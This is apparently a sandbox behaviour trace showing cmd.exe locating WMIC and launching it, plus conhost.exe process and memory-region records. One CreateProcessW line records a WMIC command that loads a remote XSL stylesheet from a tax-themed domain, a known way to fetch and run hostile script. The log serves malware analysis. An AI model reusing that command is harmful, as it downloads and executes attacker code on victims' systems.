	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x7ff64914d700, cchData=32 | out: lpLCData="Mon") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x7ff64914d740, cchData=32 | out: lpLCData="Tue") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x7ff64914d780, cchData=32 | out: lpLCData="Wed") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x7ff64914d7c0, cchData=32 | out: lpLCData="Thu") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x7ff64914d800, cchData=32 | out: lpLCData="Fri") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x7ff64914d840, cchData=32 | out: lpLCData="Sat") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x7ff64914d880, cchData=32 | out: lpLCData="Sun") returned 4
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x7ff64914d6c0, cchData=8 | out: lpLCData=".") returned 2
	[0110.526] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x7ff64914d6e0, cchData=8 | out: lpLCData=",") returned 2
	[0110.526] setlocale (category=0, locale=".OCP") returned="English_United States.437"
	[0110.527] GetConsoleTitleW (in: lpConsoleTitle=0x18a099810c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0110.527] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x7ffc17120000
	[0110.527] GetProcAddress (hModule=0x7ffc17120000, lpProcName="CopyFileExW") returned 0x7ffc17148940
	[0110.528] GetProcAddress (hModule=0x7ffc17120000, lpProcName="IsDebuggerPresent") returned 0x7ffc17147460
	[0110.528] GetProcAddress (hModule=0x7ffc17120000, lpProcName="SetConsoleInputExeNameW") returned 0x7ffc145a6e50
	[0110.528] _wcsicmp (_String1="wmic", _String2=")") returned 78
	[0110.528] _wcsicmp (_String1="FOR", _String2="wmic") returned -17
	[0110.528] _wcsicmp (_String1="FOR/?", _String2="wmic") returned -17
	[0110.528] _wcsicmp (_String1="IF", _String2="wmic") returned -14
	[0110.528] _wcsicmp (_String1="IF/?", _String2="wmic") returned -14
	[0110.528] _wcsicmp (_String1="REM", _String2="wmic") returned -5
	[0110.528] _wcsicmp (_String1="REM/?", _String2="wmic") returned -5
	[0110.529] GetConsoleTitleW (in: lpConsoleTitle=0x183c8ff8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0110.530] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0110.530] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0110.530] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0110.530] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0110.530] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0110.530] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0110.530] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0110.530] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0110.530] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0110.530] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0110.530] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0110.530] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0110.530] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0110.530] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0110.530] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0110.530] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0110.530] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0110.533] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0110.533] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0110.533] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0110.533] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0110.533] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0110.533] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0110.533] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0110.533] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0110.533] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0110.533] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0110.533] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0110.533] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0110.533] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0110.533] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0110.533] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0110.533] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0110.533] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0110.533] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0110.533] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0110.533] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0110.533] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0110.533] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0110.533] _wcsicmp (_String1="wmic", _String2="DIR") returned 19
	[0110.533] _wcsicmp (_String1="wmic", _String2="ERASE") returned 18
	[0110.533] _wcsicmp (_String1="wmic", _String2="DEL") returned 19
	[0110.533] _wcsicmp (_String1="wmic", _String2="TYPE") returned 3
	[0110.533] _wcsicmp (_String1="wmic", _String2="COPY") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="CD") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="CHDIR") returned 20
	[0110.533] _wcsicmp (_String1="wmic", _String2="RENAME") returned 5
	[0110.533] _wcsicmp (_String1="wmic", _String2="REN") returned 5
	[0110.533] _wcsicmp (_String1="wmic", _String2="ECHO") returned 18
	[0110.533] _wcsicmp (_String1="wmic", _String2="SET") returned 4
	[0110.534] _wcsicmp (_String1="wmic", _String2="PAUSE") returned 7
	[0110.534] _wcsicmp (_String1="wmic", _String2="DATE") returned 19
	[0110.534] _wcsicmp (_String1="wmic", _String2="TIME") returned 3
	[0110.534] _wcsicmp (_String1="wmic", _String2="PROMPT") returned 7
	[0110.534] _wcsicmp (_String1="wmic", _String2="MD") returned 10
	[0110.534] _wcsicmp (_String1="wmic", _String2="MKDIR") returned 10
	[0110.534] _wcsicmp (_String1="wmic", _String2="RD") returned 5
	[0110.534] _wcsicmp (_String1="wmic", _String2="RMDIR") returned 5
	[0110.534] _wcsicmp (_String1="wmic", _String2="PATH") returned 7
	[0110.534] _wcsicmp (_String1="wmic", _String2="GOTO") returned 16
	[0110.534] _wcsicmp (_String1="wmic", _String2="SHIFT") returned 4
	[0110.534] _wcsicmp (_String1="wmic", _String2="CLS") returned 20
	[0110.534] _wcsicmp (_String1="wmic", _String2="CALL") returned 20
	[0110.534] _wcsicmp (_String1="wmic", _String2="VERIFY") returned 1
	[0110.534] _wcsicmp (_String1="wmic", _String2="VER") returned 1
	[0110.534] _wcsicmp (_String1="wmic", _String2="VOL") returned 1
	[0110.534] _wcsicmp (_String1="wmic", _String2="EXIT") returned 18
	[0110.534] _wcsicmp (_String1="wmic", _String2="SETLOCAL") returned 4
	[0110.534] _wcsicmp (_String1="wmic", _String2="ENDLOCAL") returned 18
	[0110.534] _wcsicmp (_String1="wmic", _String2="TITLE") returned 3
	[0110.534] _wcsicmp (_String1="wmic", _String2="START") returned 4
	[0110.534] _wcsicmp (_String1="wmic", _String2="DPATH") returned 19
	[0110.534] _wcsicmp (_String1="wmic", _String2="KEYS") returned 12
	[0110.534] _wcsicmp (_String1="wmic", _String2="MOVE") returned 10
	[0110.534] _wcsicmp (_String1="wmic", _String2="PUSHD") returned 7
	[0110.534] _wcsicmp (_String1="wmic", _String2="POPD") returned 7
	[0110.534] _wcsicmp (_String1="wmic", _String2="ASSOC") returned 22
	[0110.534] _wcsicmp (_String1="wmic", _String2="FTYPE") returned 17
	[0110.534] _wcsicmp (_String1="wmic", _String2="BREAK") returned 21
	[0110.534] _wcsicmp (_String1="wmic", _String2="COLOR") returned 20
	[0110.534] _wcsicmp (_String1="wmic", _String2="MKLINK") returned 10
	[0110.534] _wcsicmp (_String1="wmic", _String2="FOR") returned 17
	[0110.534] _wcsicmp (_String1="wmic", _String2="IF") returned 14
	[0110.534] _wcsicmp (_String1="wmic", _String2="REM") returned 5
	[0110.534] _wcsnicmp (_String1="wmic", _String2="cmd ", _MaxCount=0x4) returned 20
	[0110.535] SetErrorMode (uMode=0x0) returned 0x8001
	[0110.535] SetErrorMode (uMode=0x1) returned 0x0
	[0110.535] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x18a09988b00, lpFilePart=0x183c8ff190 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop", lpFilePart=0x183c8ff190*="Desktop") returned 0x19
	[0110.535] SetErrorMode (uMode=0x8001) returned 0x1
	[0110.535] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87
	[0110.535] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0110.545] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff6491496a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0110.555] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0110.555] FindFirstFileExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Desktop\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0xffffffffffffffff
	[0110.555] GetLastError () returned 0x2
	[0110.555] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0110.556] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0xffffffffffffffff
	[0110.558] GetLastError () returned 0x2
	[0110.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0110.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0xffffffffffffffff
	[0110.558] GetLastError () returned 0x2
	[0110.558] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0110.558] FindFirstFileExW (in: lpFileName="C:\\Windows\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0xffffffffffffffff
	[0110.559] GetLastError () returned 0x2
	[0110.559] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0110.559] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.*", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0x18a09988eb0
	[0110.559] FindClose (in: hFindFile=0x18a09988eb0 | out: hFindFile=0x18a09988eb0) returned 1
	[0110.560] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0xffffffffffffffff
	[0110.602] GetLastError () returned 0x2
	[0110.602] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x183c8fef10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x183c8fef10) returned 0x18a09988eb0
	[0110.602] FindClose (in: hFindFile=0x18a09988eb0 | out: hFindFile=0x18a09988eb0) returned 1
	[0110.602] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0110.602] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0110.602] GetConsoleTitleW (in: lpConsoleTitle=0x183c8ff470, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SYSTEM32\\CMD.EXE") returned 0x1b
	[0110.605] InitializeProcThreadAttributeList (in: lpAttributeList=0x183c8ff390, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x183c8ff290 | out: lpAttributeList=0x183c8ff390, lpSize=0x183c8ff290) returned 1
	[0110.606] UpdateProcThreadAttribute (in: lpAttributeList=0x183c8ff390, dwFlags=0x0, Attribute=0x60001, lpValue=0x183c8ff27c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x183c8ff390, lpPreviousValue=0x0) returned 1
	[0110.606] GetStartupInfoW (in: lpStartupInfo=0x183c8ff320 | out: lpStartupInfo=0x183c8ff320*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SYSTEM32\\CMD.EXE", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x7, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) 
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="FPS_BRO", _MaxCount=0x7) returned -3
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0110.606] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0110.607] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0110.607] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0110.607] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0110.607] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0110.607] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0110.607] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1
	[0110.608] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\Nd9E1FYi\\Desktop", lpStartupInfo=0x183c8ff2b0*(cb=0x70, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x183c8ff298 | out: lpCommandLine="wmic  os get /format:\"https://itaxkenya.com/kra/tax_returns.xsl\" ", lpProcessInformation=0x183c8ff298*(hProcess=0x8c, hThread=0x88, dwProcessId=0x434, dwThreadId=0x6bc)) returned 1
	[0110.613] CloseHandle (hObject=0x88) returned 1
	[0110.613] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0110.613] GetEnvironmentStringsW () returned 0x18a099858d0*
	[0110.613] FreeEnvironmentStringsA (penv="=") returned 1
	[0110.613] WaitForSingleObject (hHandle=0x8c, dwMilliseconds=0xffffffff) 

Thread:
	id = 186
	os_tid = 0xbd4


Process:
	id = "9"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x11639000"
	os_pid = "0xc64"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "8"
	os_parent_pid = "0xcd4"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "X2VS1CUM\\Nd9E1FYi"
	os_groups = "X2VS1CUM\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb37" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1750
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1751
	        start_va = 0xe8eba00000
	          end_va = 0xe8ebbfffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e8eba00000"
	        filename = ""

Region:
	              id = 1752
	        start_va = 0xe8ebc00000
	          end_va = 0xe8ebc3ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e8ebc00000"
	        filename = ""

Region:
	              id = 1753
	        start_va = 0x24d05150000
	          end_va = 0x24d0516ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05150000"
	        filename = ""

Region:
	              id = 1754
	        start_va = 0x24d05170000
	          end_va = 0x24d05184fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05170000"
	        filename = ""

Region:
	              id = 1755
	        start_va = 0x7df5ff080000
	          end_va = 0x7ff5ff07ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff080000"
	        filename = ""

Region:
	              id = 1756
	        start_va = 0x7ff7aa990000
	          end_va = 0x7ff7aa9b2fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7aa990000"
	        filename = ""

Region:
	              id = 1757
	        start_va = 0x7ff7ab8e0000
	          end_va = 0x7ff7ab8f0fff
	     entry_point = 0x7ff7ab8e0000
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 1758
	        start_va = 0x7ffc17400000
	          end_va = 0x7ffc175c0fff
	     entry_point = 0x7ffc17400000
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1759
	        start_va = 0x24d05150000
	          end_va = 0x24d0515ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05150000"
	        filename = ""

Region:
	              id = 1760
	        start_va = 0x24d05370000
	          end_va = 0x24d0546ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05370000"
	        filename = ""

Region:
	              id = 1761
	        start_va = 0x7ff7aa890000
	          end_va = 0x7ff7aa98ffff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7aa890000"
	        filename = ""

Region:
	              id = 1762
	        start_va = 0x7ffc14550000
	          end_va = 0x7ffc14737fff
	     entry_point = 0x7ffc14550000
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1763
	        start_va = 0x7ffc17120000
	          end_va = 0x7ffc171ccfff
	     entry_point = 0x7ffc17120000
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1764
	        start_va = 0xe8ebc40000
	          end_va = 0xe8ebc7ffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e8ebc40000"
	        filename = ""

Region:
	              id = 1765
	        start_va = 0x24d05190000
	          end_va = 0x24d0524dfff
	     entry_point = 0x24d05190000
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1766
	        start_va = 0x24d052d0000
	          end_va = 0x24d052dffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d052d0000"
	        filename = ""

Region:
	              id = 1767
	        start_va = 0x7ffc164b0000
	          end_va = 0x7ffc1654cfff
	     entry_point = 0x7ffc164b0000
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1768
	        start_va = 0x24d05160000
	          end_va = 0x24d05166fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05160000"
	        filename = ""

Region:
	              id = 1769
	        start_va = 0x24d05250000
	          end_va = 0x24d05250fff
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024d05250000"
	        filename = ""

Region:
	              id = 1770
	        start_va = 0x24d05260000
	          end_va = 0x24d05266fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05260000"
	        filename = ""

Region:
	              id = 1771
	        start_va = 0x7ffbfcc10000
	          end_va = 0x7ffbfcc68fff
	     entry_point = 0x7ffbfcc10000
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 1772
	        start_va = 0x7ffc11ef0000
	          end_va = 0x7ffc12075fff
	     entry_point = 0x7ffc11ef0000
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1773
	        start_va = 0x7ffc144e0000
	          end_va = 0x7ffc14549fff
	     entry_point = 0x7ffc144e0000
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1774
	        start_va = 0x7ffc14800000
	          end_va = 0x7ffc14942fff
	     entry_point = 0x7ffc14800000
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1775
	        start_va = 0x7ffc14950000
	          end_va = 0x7ffc14a6bfff
	     entry_point = 0x7ffc14950000
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1776
	        start_va = 0x7ffc15fd0000
	          end_va = 0x7ffc1624cfff
	     entry_point = 0x7ffc15fd0000
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1777
	        start_va = 0x7ffc16660000
	          end_va = 0x7ffc166bafff
	     entry_point = 0x7ffc16660000
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1778
	        start_va = 0x7ffc167d0000
	          end_va = 0x7ffc1680afff
	     entry_point = 0x7ffc167d0000
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1779
	        start_va = 0x7ffc169e0000
	          end_va = 0x7ffc16b65fff
	     entry_point = 0x7ffc169e0000
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1780
	        start_va = 0x7ffc16fb0000
	          end_va = 0x7ffc17070fff
	     entry_point = 0x7ffc16fb0000
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1781
	        start_va = 0x7ffc171d0000
	          end_va = 0x7ffc17325fff
	     entry_point = 0x7ffc171d0000
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1782
	        start_va = 0xe8ebc80000
	          end_va = 0xe8ebcbffff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000e8ebc80000"
	        filename = ""

Region:
	              id = 1783
	        start_va = 0x24d05270000
	          end_va = 0x24d05270fff
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024d05270000"
	        filename = ""
